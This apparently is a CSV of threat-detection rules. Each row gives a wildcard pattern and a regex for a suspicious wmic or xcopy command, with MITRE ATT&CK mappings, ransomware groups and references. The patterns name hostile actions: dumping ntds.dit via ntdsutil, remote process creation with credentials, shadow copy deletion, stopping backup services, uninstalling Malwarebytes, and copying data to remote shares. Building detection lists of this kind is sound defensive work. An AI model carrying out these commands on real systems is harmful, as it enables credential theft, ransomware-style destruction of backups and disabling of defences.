"*\Temp\*\ntds.jfm*",".{0,1000}\\Temp\\.{0,1000}\\ntds\.jfm.{0,1000}","greyware_tool_keyword","wmic","Like the ntds.dit file it should not normally be found in the Temp directory.","T1047 - T1005 - T1567.001","TA0002 - TA0003 - TA0007","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Credential Access","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Users\Public\*ntds.dit*",".{0,1000}\\Users\\Public\\.{0,1000}ntds\.dit.{0,1000}","greyware_tool_keyword","wmic","this file shouldn't be found in the Users\Public directory. Its presence could be a sign of an ongoing or past attack.","T1047 - T1005 - T1567.001","TA0002 - TA0003 - TA0007","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Credential Access","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Users\Public\*ntds.jfm*",".{0,1000}\\Users\\Public\\.{0,1000}ntds\.jfm.{0,1000}","greyware_tool_keyword","wmic","Like the ntds.dit file it should not normally be found in this directory.","T1047 - T1005 - T1567.001","TA0002 - TA0003 - TA0007","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Credential Access","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*ac i ntds*\\127.0.0.1\ADMIN$\*",".{0,1000}ac\si\sntds.{0,1000}\\\\127\.0\.0\.1\\ADMIN\$\\.{0,1000}","greyware_tool_keyword","wmic","The actor has executed WMIC commands [T1047] to create a copy of the ntds.dit file and SYSTEM registry hive using ntdsutil.exe","T1047 - T1005 - T1567.001","TA0002 - TA0003 - TA0007","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Credential Access","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*cmd  /c wmic /node:* process call create ""C:\programdata\*",".{0,1000}cmd\s\s\/c\swmic\s\/node\:.{0,1000}\sprocess\scall\screate\s\""C\:\\programdata\\.{0,1000}","greyware_tool_keyword","wmic","suspicious lateral movement command executing payload from suspicious directories","T1570 - T1021","TA0008","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Lateral Movement","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*cmd  /c wmic /node:* process call create ""C:\Temp\*",".{0,1000}cmd\s\s\/c\swmic\s\/node\:.{0,1000}\sprocess\scall\screate\s\""C\:\\Temp\\.{0,1000}","greyware_tool_keyword","wmic","suspicious lateral movement command executing payload from suspicious directories","T1570 - T1021","TA0008","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Lateral Movement","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*cmd  /c wmic /node:* process call create ""C:\users\*\AppData\Local\Temp*",".{0,1000}cmd\s\s\/c\swmic\s\/node\:.{0,1000}\sprocess\scall\screate\s\""C\:\\users\\.{0,1000}\\AppData\\Local\\Temp.{0,1000}","greyware_tool_keyword","wmic","suspicious lateral movement command executing payload from suspicious directories","T1570 - T1021","TA0008","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Lateral Movement","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*cmd  /c wmic /node:* process call create ""C:\users\Public*",".{0,1000}cmd\s\s\/c\swmic\s\/node\:.{0,1000}\sprocess\scall\screate\s\""C\:\\users\\Public.{0,1000}","greyware_tool_keyword","wmic","suspicious lateral movement command executing payload from suspicious directories","T1570 - T1021","TA0008","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Lateral Movement","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*cmd.exe /C wmic /node:* /user:* /password:* os get caption*",".{0,1000}cmd\.exe\s\/C\swmic\s\/node\:.{0,1000}\s\/user\:.{0,1000}\s\/password\:.{0,1000}\sos\sget\scaption.{0,1000}","greyware_tool_keyword","wmic","gather information about Windows OS version and licensing on the hosts","T1047 - T1016 - T1082","TA0007 - TA0002 - TA0005","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Discovery","https://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/","1","0","N/A","greyware tool - risks of False positive !","6","9","N/A","N/A","N/A","N/A"
"*process call create ""powershell enable-psremoting -force""*",".{0,1000}process\scall\screate\s\""powershell\senable\-psremoting\s\-force\"".{0,1000}","greyware_tool_keyword","wmic","Enable WinRM remotely with wmic","T1021.006 - T1059.001 - T1047","TA0002 - TA0008 - TA0011","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Lateral Movement","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*start wmic /node:@C:\*.txt /user:*/password:* process call create *cmd.exe /c bitsadmin /transfer *.exe *",".{0,1000}start\swmic\s\/node\:\@C\:\\.{0,1000}\.txt\s\/user\:.{0,1000}\/password\:.{0,1000}\sprocess\scall\screate\s.{0,1000}cmd\.exe\s\/c\sbitsadmin\s\/transfer\s.{0,1000}\.exe\s.{0,1000}","greyware_tool_keyword","wmic","WMIC suspicious transfer ","T1105 - T1041 - T1048","TA0002 - TA0003 - TA0010","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Exploitation tool","N/A","1","0","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
"*Win32_Shadowcopy | ForEach-Object {$_.Delete();*",".{0,1000}Win32_Shadowcopy\s\|\sForEach\-Object\s\{\$_\.Delete\(\)\;.{0,1000}","greyware_tool_keyword","wmic","VSS is a feature in Windows that allows for the creation of snapshots of a volume capturing its state at a specific point in time. Adversaries may abuse the wmic shadowcopy command to interact with these shadow copies for defense evasion purposes.","T1490 - T1562.002","TA0040 - TA0007","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Defense Evasion","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*wmic /* /user:administrator process call create *cmd.exe /c *",".{0,1000}wmic\s\/.{0,1000}\s\/user\:administrator\sprocess\scall\screate\s.{0,1000}cmd\.exe\s\/c\s.{0,1000}","greyware_tool_keyword","wmic","Lateral Movement with wmic","T1078 - T1028 - T1106 - T1105","TA0002 - TA0004","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Reconnaissance","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Anti-Forensics.md","1","0","N/A","N/A","N/A","10","1237","155","2024-08-26T19:30:51Z","2021-08-16T17:34:25Z"
"*wmic /node:* /user:* /password:* process call create ""\\*\*.exe*",".{0,1000}wmic\s\/node\:.{0,1000}\s\/user\:.{0,1000}\s\/password\:.{0,1000}\sprocess\scall\screate\s\""\\\\.{0,1000}\\.{0,1000}\.exe.{0,1000}","greyware_tool_keyword","wmic","Execute file hosted over SMB on remote system with specified credential","T1021.002 - T1047","TA0002 - TA0008","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Lateral Movement","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*wmic /node:* path Win32_TerminalServiceSetting where AllowTSConnections=""0"" call SetAllowTSConnections ""1""*",".{0,1000}wmic\s\/node\:.{0,1000}\spath\sWin32_TerminalServiceSetting\swhere\sAllowTSConnections\=\""0\""\scall\sSetAllowTSConnections\s\""1\"".{0,1000}","greyware_tool_keyword","wmic","Remotely start RDP with wmic","T1021.006 - T1112 - T1562.001","TA0002 - TA0008","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Lateral Movement","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*wmic /node:*.*.*.*computersystem get username*",".{0,1000}wmic\s\/node\:.{0,1000}\..{0,1000}\..{0,1000}\..{0,1000}computersystem\sget\susername.{0,1000}","greyware_tool_keyword","wmic","get the currently logged user with wmic","T1047 - T1033","TA0002 - TA0007","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Discovery","N/A","1","0","N/A","greyware tool - risks of False positive !","5","10","N/A","N/A","N/A","N/A"
"*wmic /node:*localhost*computersystem get username*",".{0,1000}wmic\s\/node\:.{0,1000}localhost.{0,1000}computersystem\sget\susername.{0,1000}","greyware_tool_keyword","wmic","get the currently logged user with wmic","T1047 - T1033","TA0002 - TA0007","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Discovery","N/A","1","0","N/A","greyware tool - risks of False positive !","5","10","N/A","N/A","N/A","N/A"
"*wmic computersystem get domain*",".{0,1000}wmic\scomputersystem\sget\sdomain.{0,1000}","greyware_tool_keyword","wmic","get domain name with wmic","T1016 - T1087.002","TA0007 - TA0009","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Discovery","N/A","1","0","N/A","greyware tool - risks of False positive !","5","10","N/A","N/A","N/A","N/A"
"*wmic process call create*ntdsutil *ac i ntds* ifm*create full*",".{0,1000}wmic\sprocess\scall\screate.{0,1000}ntdsutil\s.{0,1000}ac\si\sntds.{0,1000}\sifm.{0,1000}create\sfull.{0,1000}","greyware_tool_keyword","wmic","The actor has executed WMIC commands [T1047] to create a copy of the ntds.dit file and SYSTEM registry hive using ntdsutil.exe","T1047 - T1005 - T1567.001","TA0002 - TA0003 - TA0007","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Credential Access","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
"*wmic process get commandline -all*",".{0,1000}wmic\sprocess\sget\scommandline\s\-all.{0,1000}","greyware_tool_keyword","wmic","list all running processes and their command lines on a Windows system","T1057 - T1082 - T1518","TA0007 - TA0009","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Discovery","https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a","1","0","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*wmic product where ""name like '%Malwarebytes%'"" call uninstall /nointeractive*",".{0,1000}wmic\sproduct\swhere\s\""name\slike\s\'\%Malwarebytes\%\'\""\scall\suninstall\s\/nointeractive.{0,1000}","greyware_tool_keyword","wmic","uninstall Malwarebytes","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*wmic product where ""name like 'Malwarebytes%'"" call uninstall /nointeractive*",".{0,1000}wmic\sproduct\swhere\s\""name\slike\s\'Malwarebytes\%\'\""\scall\suninstall\s\/nointeractive.{0,1000}","greyware_tool_keyword","wmic","uninstall Malwarebytes","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*wmic service brief*",".{0,1000}wmic\sservice\sbrief.{0,1000}","greyware_tool_keyword","wmic","wmic discovery commands abused by attackers","T1007","TA0007 ","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Discovery","N/A","1","0","N/A","greyware tool - risks of False positive !","N/A","4","N/A","N/A","N/A","N/A"
"*wmic service where ""name like '%veeam%'"" call stopservice*",".{0,1000}wmic\sservice\swhere\s\""name\slike\s\'\%veeam\%\'\""\scall\sstopservice.{0,1000}","greyware_tool_keyword","wmic","stopping backup service","T1562.002 - T1489","TA0005 - TA0040","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*wmic service where ""name like 'acronisagent%'"" call stopservice*",".{0,1000}wmic\sservice\swhere\s\""name\slike\s\'acronisagent\%\'\""\scall\sstopservice.{0,1000}","greyware_tool_keyword","wmic","stopping backup service","T1562.002 - T1489","TA0005 - TA0040","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*wmic service where ""name like 'acrsch2svc%'"" call stopservice*",".{0,1000}wmic\sservice\swhere\s\""name\slike\s\'acrsch2svc\%\'\""\scall\sstopservice.{0,1000}","greyware_tool_keyword","wmic","stopping backup service","T1562.002 - T1489","TA0005 - TA0040","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*wmic service where ""name like 'agntsvc%'"" call stopservice*",".{0,1000}wmic\sservice\swhere\s\""name\slike\s\'agntsvc\%\'\""\scall\sstopservice.{0,1000}","greyware_tool_keyword","wmic","stopping backup service","T1562.002 - T1489","TA0005 - TA0040","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*wmic service where ""name like 'arsm%'"" call stopservice*",".{0,1000}wmic\sservice\swhere\s\""name\slike\s\'arsm\%\'\""\scall\sstopservice.{0,1000}","greyware_tool_keyword","wmic","stopping backup service","T1562.002 - T1489","TA0005 - TA0040","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*wmic service where ""name like 'backp%'"" call stopservice*",".{0,1000}wmic\sservice\swhere\s\""name\slike\s\'backp\%\'\""\scall\sstopservice.{0,1000}","greyware_tool_keyword","wmic","stopping backup service","T1562.002 - T1489","TA0005 - TA0040","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*wmic service where ""name like 'backup%'"" call stopservice*",".{0,1000}wmic\sservice\swhere\s\""name\slike\s\'backup\%\'\""\scall\sstopservice.{0,1000}","greyware_tool_keyword","wmic","stopping backup service","T1562.002 - T1489","TA0005 - TA0040","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*wmic service where ""name like 'cbservi%'"" call stopservice*",".{0,1000}wmic\sservice\swhere\s\""name\slike\s\'cbservi\%\'\""\scall\sstopservice.{0,1000}","greyware_tool_keyword","wmic","stopping backup service","T1562.002 - T1489","TA0005 - TA0040","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*wmic service where ""name like 'cbvscserv%'"" call stopservice*",".{0,1000}wmic\sservice\swhere\s\""name\slike\s\'cbvscserv\%\'\""\scall\sstopservice.{0,1000}","greyware_tool_keyword","wmic","stopping backup service","T1562.002 - T1489","TA0005 - TA0040","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*wmic service where ""name like 'shadowprotectsvc%'"" call stopservice*",".{0,1000}wmic\sservice\swhere\s\""name\slike\s\'shadowprotectsvc\%\'\""\scall\sstopservice.{0,1000}","greyware_tool_keyword","wmic","stopping backup service","T1562.002 - T1489","TA0005 - TA0040","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*wmic service where ""name like 'spxservice%'"" call stopservice*",".{0,1000}wmic\sservice\swhere\s\""name\slike\s\'spxservice\%\'\""\scall\sstopservice.{0,1000}","greyware_tool_keyword","wmic","stopping backup service","T1562.002 - T1489","TA0005 - TA0040","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*wmic service where ""name like 'sqbcoreservice%'"" call stopservice*",".{0,1000}wmic\sservice\swhere\s\""name\slike\s\'sqbcoreservice\%\'\""\scall\sstopservice.{0,1000}","greyware_tool_keyword","wmic","stopping backup service","T1562.002 - T1489","TA0005 - TA0040","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*wmic service where ""name like 'stc_endpt_svc%'"" call stopservice*",".{0,1000}wmic\sservice\swhere\s\""name\slike\s\'stc_endpt_svc\%\'\""\scall\sstopservice.{0,1000}","greyware_tool_keyword","wmic","stopping backup service","T1562.002 - T1489","TA0005 - TA0040","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*wmic service where ""name like 'storagecraft imagemanager%'"" call stopservice*",".{0,1000}wmic\sservice\swhere\s\""name\slike\s\'storagecraft\simagemanager\%\'\""\scall\sstopservice.{0,1000}","greyware_tool_keyword","wmic","stopping backup service","T1562.002 - T1489","TA0005 - TA0040","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*wmic service where ""name like 'veeam%'"" call stopservice*",".{0,1000}wmic\sservice\swhere\s\""name\slike\s\'veeam\%\'\""\scall\sstopservice.{0,1000}","greyware_tool_keyword","wmic","stopping backup service","T1562.002 - T1489","TA0005 - TA0040","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*wmic service where ""name like 'vsnapvss%'"" call stopservice*",".{0,1000}wmic\sservice\swhere\s\""name\slike\s\'vsnapvss\%\'\""\scall\sstopservice.{0,1000}","greyware_tool_keyword","wmic","stopping backup service","T1562.002 - T1489","TA0005 - TA0040","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*wmic service where ""name like 'vssvc%'"" call stopservice*",".{0,1000}wmic\sservice\swhere\s\""name\slike\s\'vssvc\%\'\""\scall\sstopservice.{0,1000}","greyware_tool_keyword","wmic","stopping backup service","T1562.002 - T1489","TA0005 - TA0040","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*wmic service where ""name like 'wbengine%'"" call stopservice*",".{0,1000}wmic\sservice\swhere\s\""name\slike\s\'wbengine\%\'\""\scall\sstopservice.{0,1000}","greyware_tool_keyword","wmic","stopping backup service","T1562.002 - T1489","TA0005 - TA0040","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*wmic SHADOWCOPY /nointeractive*",".{0,1000}wmic\sSHADOWCOPY\s\/nointeractive.{0,1000}","greyware_tool_keyword","wmic","VSS is a feature in Windows that allows for the creation of snapshots of a volume capturing its state at a specific point in time. Adversaries may abuse the wmic shadowcopy command to interact with these shadow copies for defense evasion purposes.","T1490 - T1562.002","TA0040 - TA0007","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Defense Evasion","N/A","1","0","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
"*wmic shadowcopy delete*",".{0,1000}wmic\sshadowcopy\sdelete.{0,1000}","greyware_tool_keyword","wmic","VSS is a feature in Windows that allows for the creation of snapshots of a volume capturing its state at a specific point in time. Adversaries may abuse the wmic shadowcopy command to interact with these shadow copies for defense evasion purposes.","T1490 - T1562.002","TA0040 - TA0007","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Defense Evasion","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*wmic useraccount get /ALL /format:csv*",".{0,1000}wmic\suseraccount\sget\s\/ALL\s\/format\:csv.{0,1000}","greyware_tool_keyword","wmic","User Enumeration","T1087 - T1033","TA0006","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Reconnaissance","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Anti-Forensics.md","1","0","N/A","N/A","10","10","1237","155","2024-08-26T19:30:51Z","2021-08-16T17:34:25Z"
"*wmic volume list brief*",".{0,1000}wmic\svolume\slist\sbrief.{0,1000}","greyware_tool_keyword","wmic","wmic discovery commands abused by attackers","T1082","TA0007 ","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Discovery","N/A","1","0","N/A","greyware tool - risks of False positive !","N/A","4","N/A","N/A","N/A","N/A"
"*wmic*/Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName*",".{0,1000}wmic.{0,1000}\/Namespace\:\\\\root\\SecurityCenter2\sPath\sAntiVirusProduct\sGet\sdisplayName.{0,1000}","greyware_tool_keyword","wmic","list AV products with wmic","T1518.001 - T1082","TA0007 - TA0005","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Discovery","N/A","1","0","N/A","greyware tool - risks of False positive !","2","9","N/A","N/A","N/A","N/A"
"*wmic.exe process call create *.txt:*.exe*",".{0,1000}wmic\.exe\sprocess\scall\screate\s.{0,1000}\.txt\:.{0,1000}\.exe.{0,1000}","greyware_tool_keyword","wmic","Execute a .EXE file stored as an Alternate Data Stream (ADS)","T1105 - T1027.001 - T1096 - T1036","TA0002 - TA0008","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Defense Evasion","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Anti-Forensics.md","1","0","N/A","N/A","N/A","10","1237","155","2024-08-26T19:30:51Z","2021-08-16T17:34:25Z"
"*wmic.exe process call create *cmd /c *",".{0,1000}wmic\.exe\sprocess\scall\screate\s.{0,1000}cmd\s\/c\s.{0,1000}","greyware_tool_keyword","wmic","call cmd.exe with wmic","T1047 - T1059","TA0002 - TA0009","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Collection","N/A","1","0","N/A","greyware tool - risks of False positive !","5","10","N/A","N/A","N/A","N/A"
"*wmic.exe SHADOWCOPY /nointeractive*",".{0,1000}wmic\.exe\sSHADOWCOPY\s\/nointeractive.{0,1000}","greyware_tool_keyword","wmic","VSS is a feature in Windows that allows for the creation of snapshots of a volume capturing its state at a specific point in time. Adversaries may abuse the wmic shadowcopy command to interact with these shadow copies for defense evasion purposes.","T1490 - T1562.002","TA0040 - TA0007","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Defense Evasion","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*wmic.exe shadowcopy delete*",".{0,1000}wmic\.exe\sshadowcopy\sdelete.{0,1000}","greyware_tool_keyword","wmic","VSS is a feature in Windows that allows for the creation of snapshots of a volume capturing its state at a specific point in time. Adversaries may abuse the wmic shadowcopy command to interact with these shadow copies for defense evasion purposes.","T1490 - T1562.002","TA0040 - TA0005","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*WMIC.exe shadowcopy where *ID=* delete*",".{0,1000}WMIC\.exe\sshadowcopy\swhere\s.{0,1000}ID\=.{0,1000}\sdelete.{0,1000}","greyware_tool_keyword","wmic","VSS is a feature in Windows that allows for the creation of snapshots of a volume capturing its state at a specific point in time. Adversaries may abuse the wmic shadowcopy command to interact with these shadow copies for defense evasion purposes.","T1490 - T1562.002","TA0040 - TA0005","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*mhngpdlhojliikfknhfaglpnddniijfh*",".{0,1000}mhngpdlhojliikfknhfaglpnddniijfh.{0,1000}","greyware_tool_keyword","WorkingVPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A"
"*cmd /c xcopy /s /i /h /e /q /y /d*",".{0,1000}cmd\s\/c\sxcopy\s\/s\s\/i\s\/h\s\/e\s\/q\s\/y\s\/d.{0,1000}","greyware_tool_keyword","xcopy","command used by Doina trojan","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Data Exfiltration","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*xcopy c:\* \\*\c$*",".{0,1000}xcopy\sc\:\\.{0,1000}\s\\\\.{0,1000}\\c\$.{0,1000}","greyware_tool_keyword","xcopy","command abused by attackers - exfiltraiton to remote host with xcopy","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Data Exfiltration","N/A","1","0","N/A","greyware_tools high risks of false positives","N/A","6","N/A","N/A","N/A","N/A"
